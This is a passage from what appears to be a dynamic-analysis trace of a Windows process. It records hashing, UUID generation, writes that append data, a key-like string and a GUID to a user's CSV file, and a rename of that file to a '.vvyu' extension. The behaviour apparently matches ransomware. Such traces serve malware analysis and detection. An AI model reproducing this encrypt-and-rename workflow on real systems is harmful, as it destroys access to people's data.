phHash=0x2f9fa58) returned 1 [0196.913] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.914] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.914] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.914] GetLastError () returned 0x0 [0196.914] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.914] CryptReleaseContext (hProv=0x31b640, dwFlags=0x0) returned 1 [0196.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.914] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.914] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.915] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60f0) returned 0x2af5168 [0196.915] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea530 [0196.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea578 [0196.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0196.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0196.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0196.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.916] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0196.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0196.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0196.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0196.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66f8 [0196.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae66e0 [0196.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0196.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0196.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0196.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.919] GetCurrentThreadId () returned 0x5d8 [0196.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2420 [0196.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.920] GetCurrentThreadId () returned 0x5d8 [0196.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0196.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0196.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66f8 [0196.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0196.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6758 [0196.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0196.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0196.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6770 [0196.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6710 [0196.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66e0 [0196.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea578 | out: hHeap=0x2c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.931] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x60e0, lpOverlapped=0x0) returned 1 [0196.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.932] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x60e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.932] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.933] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.933] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.934] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.934] CloseHandle (hObject=0x584) returned 1 [0196.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0196.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0196.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0196.936] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\hsj_qR5BNe5MoizBn.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\hsj_qr5bne5moizbn.csv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\hsj_qR5BNe5MoizBn.csv.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\hsj_qr5bne5moizbn.csv.vvyu")) returned 1 [0196.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.937] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0196.941] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5d99300, ftCreationTime.dwHighDateTime=0x1d8a059, ftLastAccessTime.dwLowDateTime=0xf2cc8300, ftLastAccessTime.dwHighDateTime=0x1d8a59c, ftLastWriteTime.dwLowDateTime=0xf2cc8300, ftLastWriteTime.dwHighDateTime=0x1d8a59c, nFileSizeHigh=0x0, nFileSizeLow=0x60e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hsj_qR5BNe5MoizBn.csv", cAlternateFileName="HSJ_QR~1.CSV")) returned 0 [0196.941] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0196.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.942] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0196.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.942] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0196.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 